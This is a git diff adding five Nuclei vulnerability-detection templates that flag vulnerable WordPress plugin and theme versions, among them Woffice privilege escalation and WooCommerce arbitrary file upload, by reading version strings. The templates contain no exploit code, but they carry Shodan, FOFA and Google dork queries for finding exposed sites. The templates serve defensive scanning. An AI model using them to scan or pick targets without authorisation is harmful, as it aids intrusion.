100644 index 0000000000..b57bb061f4 --- /dev/null +++ b/poc/sql/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12560-449215acaf31dbe73bdd1b194455c475 + +info: + name: > + Button Block – Get fully customizable & multi-functional buttons <= 1.1.5 - Authenticated (Contributor+) Post Disclosure via Post Duplication + author: topscoder + severity: low + description: > + The Button Block – Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12560 + metadata: + fofa-query: "wp-content/plugins/button-block/" + google-query: inurl:"/wp-content/plugins/button-block/" + shodan-query: 'vuln:CVE-2024-12560' + tags: cve,wordpress,wp-plugin,button-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/button-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "button-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml b/poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml new file mode 100644 index 0000000000..a4dee6440c --- /dev/null +++ b/poc/sql/CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43234-7b1393281a86cb7c58f05352db8b36aa + +info: + name: > + Woffice <= 5.4.14 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Woffice CRM theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.4.14. This makes it possible for unauthenticated attackers to gain access to administrator accounts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c64089a-929c-4a36-8aa8-61a5c9e8562b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43234 + metadata: + fofa-query: "wp-content/themes/woffice/" + google-query: inurl:"/wp-content/themes/woffice/" + shodan-query: 'vuln:CVE-2024-43234' + tags: cve,wordpress,wp-theme,woffice,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/woffice/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woffice" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.4.14') \ No newline at end of file diff --git a/poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml b/poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml new file mode 100644 index 0000000000..ea05746fcc --- /dev/null +++ b/poc/sql/CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-54262-900f1530db5979118c2aeaebba1c30e9 + +info: + name: > + Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + The Import Export For WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/afb5b791-0bc7-466f-87f6-f6c5ebed576b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-54262 + metadata: + fofa-query: "wp-content/plugins/import-export-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/import-export-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-54262' + tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/import-export-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "import-export-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file diff --git a/poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml b/poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml new file mode 100644 index 0000000000..d0b44471b4 --- /dev/null +++ b/poc/sql/easy-replace-440c0e499d1853ea7db9693e4d2afca2.yaml @@ -0,0 +1,59 @@ +id: easy-replace-440c0e499d1853ea7db9693e4d2afca2 + +info: + name: > + Easy Replace <= 1.3 - Authenticated (Subscriber+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8536e655-72cc-4d7a-8ca0-7ba3042e03c1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-replace/" + google-query: inurl:"/wp-content/plugins/easy-replace/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-replace,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-replace/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-replace" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml b/poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml new file mode 100644 index 0000000000..015a0e4cbc --- /dev/null +++ b/poc/wordpress/automatorwp-c0407e34fa2c909d246b6b41858c80c4.yaml @@ -0,0 +1,59 @@ +id: automatorwp-c0407e34fa2c909d246b6b41858c80c4 + +info: + name: > + AutomatorWP <= 5.0.9 - Reflected Cross-Site Scripting via a-0-o-search_field_value + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/automatorwp/" + google-query: inurl:"/wp-content/plugins/automatorwp/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,automatorwp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/automatorwp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "automatorwp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.9') \ No newline at end of file